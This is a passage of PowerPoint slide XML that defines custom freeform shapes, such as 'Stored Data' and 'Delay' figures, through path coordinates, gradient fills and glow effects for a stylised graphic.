                <a:gd name="connsiteY4" fmla="*/ 825035 h 825035"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX0" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 892438 w 892438"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 920547 w 920547"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1267622 w 1267622"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825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7622" h="825036">
                  <a:moveTo>
                    <a:pt x="72605" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="496576" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="730729" y="0"/>
                    <a:pt x="1267622" y="184691"/>
                    <a:pt x="1267622" y="412518"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1267622" y="640345"/>
                    <a:pt x="730729" y="825036"/>
                    <a:pt x="496576" y="825036"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="72605" y="825035"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-20837" y="550023"/>
                    <a:pt x="-27511" y="248315"/>
                    <a:pt x="7260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1"/>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="0"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow rad="50800">
                <a:schemeClr val="bg1">
                  <a:alpha val="2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ectangle 77"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2671935" y="1503488"/>
              <a:ext cx="1386550" cy="1506594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alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1">
                    <a:alpha val="74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Delay 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="2735708" y="3307844"/>
              <a:ext cx="1259004" cy="451151"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX1" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX2" fmla="*/ 847942 w 847941"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825035"/>
                <a:gd name="connsiteX3" fmla="*/ 423971 w 847941"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825035"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825035"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 847941"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825035"/>
                <a:gd name="connsiteX0" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 892438 w 892438"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 468467 w 892438"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 44496 w 892438"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 920547 w 920547"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 920547"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 920547"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1267622 w 1267622"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 496576 w 1267622"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY4" fmla="*/ 825035 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 72605 w 1267622"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 95168 w 1290185"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 519139 w 1290185"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1290185 w 1290185"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 519139 w 1290185"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 55122 w 1290185"/>
                <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 95168 w 1290185"/>
                <a:gd name="connsiteY5" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 72607 w 1307667"/>
                <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX1" fmla="*/ 536621 w 1307667"/>
                <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                <a:gd name="connsiteX2" fmla="*/ 1307667 w 1307667"/>
                <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                <a:gd name="connsiteX3" fmla="*/ 536621 w 1307667"/>
                <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                <a:gd name="connsiteX4" fmla="*/ 72604 w 1307667"/>
                <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                <a:gd name="connsiteX5" fmla="*/ 72607 w 1307667"/>
                <a:gd name="connsiteY5" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX0" fmla="*/ 58234 w 1293294"/>
                <a:gd name="connsiteY0" fmla="*/ -1 h 825036"/>
                <a:gd name="connsiteX1" fmla="*/ 522248 w 1293294"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 825036"/>
                <a:gd name="connsiteX2" fmla="*/ 1293294 w 1293294"/>
                <a:gd name="connsiteY2" fmla="*/ 412518 h 825036"/>
                <a:gd name="connsiteX3" fmla="*/ 522248 w 1293294"/>
                <a:gd name="connsiteY3" fmla="*/ 825036 h 825036"/>
                <a:gd name="connsiteX4" fmla="*/ 58231 w 1293294"/>
                <a:gd name="connsiteY4" fmla="*/ 825034 h 825036"/>
                <a:gd name="connsiteX5" fmla="*/ 58234 w 1293294"/>
                <a:gd name="connsiteY5" fmla="*/ -1 h 825036"/>
                <a:gd name="connsiteX0" fmla="*/ 42588 w 1277648"/>
                <a:gd name="connsiteY0" fmla="*/ 1 h 825038"/>
                <a:gd name="connsiteX1" fmla="*/ 506602 w 1277648"/>
                <a:gd name="connsiteY1" fmla="*/ 2 h 825038"/>
                <a:gd name="connsiteX2" fmla="*/ 1277648 w 1277648"/>
                <a:gd name="connsiteY2" fmla="*/ 412520 h 825038"/>
                <a:gd name="connsiteX3" fmla="*/ 506602 w 1277648"/>
                <a:gd name="connsiteY3" fmla="*/ 825038 h 825038"/>
                <a:gd name="connsiteX4" fmla="*/ 42585 w 1277648"/>
                <a:gd name="connsiteY4" fmla="*/ 825036 h 825038"/>
                <a:gd name="connsiteX5" fmla="*/ 42588 w 1277648"/>
                <a:gd name="connsiteY5" fmla="*/ 1 h 825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77648" h="825038">
                  <a:moveTo>
                    <a:pt x="42588" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="506602" y="2"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="740755" y="2"/>
                    <a:pt x="1277648" y="184693"/>
                    <a:pt x="1277648" y="412520"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1277648" y="640347"/>
                    <a:pt x="740755" y="825038"/>
                    <a:pt x="506602" y="825038"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="42585" y="825036"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="-10810" y="550025"/>
                    <a:pt x="-17482" y="248315"/>
                    <a:pt x="42588" y="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1"/>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="51000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="32000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1"/>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
              <a:tileRect/>
            </a:gradFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
            <a:effectLst>
              <a:glow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Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3124930" y="3941265"/>
              <a:ext cx="480561" cy="1191153"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 30034 h 1104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0561" h="1104621">
                  <a:moveTo>
                    <a:pt x="0" y="30034"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160187" y="-10012"/>
                    <a:pt x="320374" y="-10012"/>
                    <a:pt x="480561" y="30034"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="480561" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="30034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glow rad="50800">
                <a:schemeClr val="bg1">
                  <a:alpha val="2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Stored Data 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="3284980" y="2889707"/>
              <a:ext cx="160460" cy="825038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 10000"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 10000"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 9759 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6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26" h="10000">
                  <a:moveTo>
                    <a:pt x="3093" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11426" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10505" y="0"/>
                    <a:pt x="8333" y="2239"/>
                    <a:pt x="8333" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8333" y="7761"/>
                    <a:pt x="10505" y="10000"/>
                    <a:pt x="11426" y="10000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3093" y="10000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2172" y="10000"/>
                    <a:pt x="0" y="7761"/>
                    <a:pt x="0" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2239"/>
                    <a:pt x="2172" y="0"/>
                    <a:pt x="3093" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:pattFill prst="narVert">
              <a:fgClr>
                <a:schemeClr val="tx1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Stored Data 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="3284980" y="2889706"/>
              <a:ext cx="160460" cy="825038"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 10000"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 10000 w 10000"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 10000"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 1667 w 10000"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 9759 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX0" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX1" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 10000"/>
                <a:gd name="connsiteX2" fmla="*/ 8333 w 11426"/>
                <a:gd name="connsiteY2" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX3" fmla="*/ 11426 w 11426"/>
                <a:gd name="connsiteY3" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX4" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY4" fmla="*/ 10000 h 10000"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 11426"/>
                <a:gd name="connsiteY5" fmla="*/ 5000 h 10000"/>
                <a:gd name="connsiteX6" fmla="*/ 3093 w 11426"/>
                <a:gd name="connsiteY6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26" h="10000">
                  <a:moveTo>
                    <a:pt x="3093" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11426" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="10505" y="0"/>
                    <a:pt x="8333" y="2239"/>
                    <a:pt x="8333" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8333" y="7761"/>
                    <a:pt x="10505" y="10000"/>
                    <a:pt x="11426" y="10000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3093" y="10000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2172" y="10000"/>
                    <a:pt x="0" y="7761"/>
                    <a:pt x="0" y="5000"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2239"/>
                    <a:pt x="2172" y="0"/>
                    <a:pt x="3093" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:gradFill>
              <a:gsLst>
                <a:gs pos="94000">
                  <a:srgbClr val="1D1D1D">
                    <a:alpha val="16000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="5000">
                  <a:srgbClr val="131313">
                    <a:alpha val="60000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="tx1"/>
                </a:gs>
                <a:gs pos="50500">
                  <a:srgbClr val="262626"/>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                    <a:alpha val="93000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="tx1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Freeform 82"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2960628" y="3197416"/>
              <a:ext cx="809164" cy="33019"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                <a:gd name="connsiteY0" fmla="*/ 33372 h 33372"/>
                <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 33372"/>
                <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                <a:gd name="connsiteY2" fmla="*/ 33372 h 33372"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 840981"/>
                <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX1" fmla="*/ 420490 w 840981"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                <a:gd name="connsiteX2" fmla="*/ 840981 w 840981"/>
                <a:gd name="connsiteY2" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 824799"/>
                <a:gd name="connsiteY0" fmla="*/ 24102 h 24102"/>
                <a:gd name="connsiteX1" fmla="*/ 404308 w 824799"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 24102"/>
                <a:gd name="connsiteX2" fmla="*/ 824799 w 824799"/>
                <a:gd name="connsiteY2" fmla="*/ 24102 h 24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24799" h="24102">
                  <a:moveTo>
                    <a:pt x="0" y="24102"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="140163" y="7416"/>
                    <a:pt x="266842" y="0"/>
                    <a:pt x="404308" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="541774" y="0"/>
                    <a:pt x="824799" y="24102"/>
                    <a:pt x="824799" y="24102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w="139700" prst="cross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ectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3194770" y="3941265"/>
              <a:ext cx="340880" cy="1191153"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1074587 h 1074587"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1074587"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1092385 h 1092385"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 17798 h 1092385"/>
                <a:gd name="connsiteX0" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY0" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX1" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY1" fmla="*/ 30034 h 1104621"/>
                <a:gd name="connsiteX2" fmla="*/ 480561 w 480561"/>
                <a:gd name="connsiteY2" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY3" fmla="*/ 1104621 h 1104621"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 480561"/>
                <a:gd name="connsiteY4" fmla="*/ 30034 h 1104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0561" h="1104621">
                  <a:moveTo>
                    <a:pt x="0" y="30034"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="160187" y="-10012"/>
                    <a:pt x="320374" y="-10012"/>
                    <a:pt x="480561" y="30034"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="480561" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1104621"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3003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/>
                </a:gs>
                <a:gs pos="50500">
                  <a:srgbClr val="FFFFFF">
                    <a:alpha val="19000"/>
                  </a:srgbClr>
                </a:gs>
                <a:gs pos="42000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="27000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="59000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="23000"/>
                  </a:schemeClr>
                </a:gs>
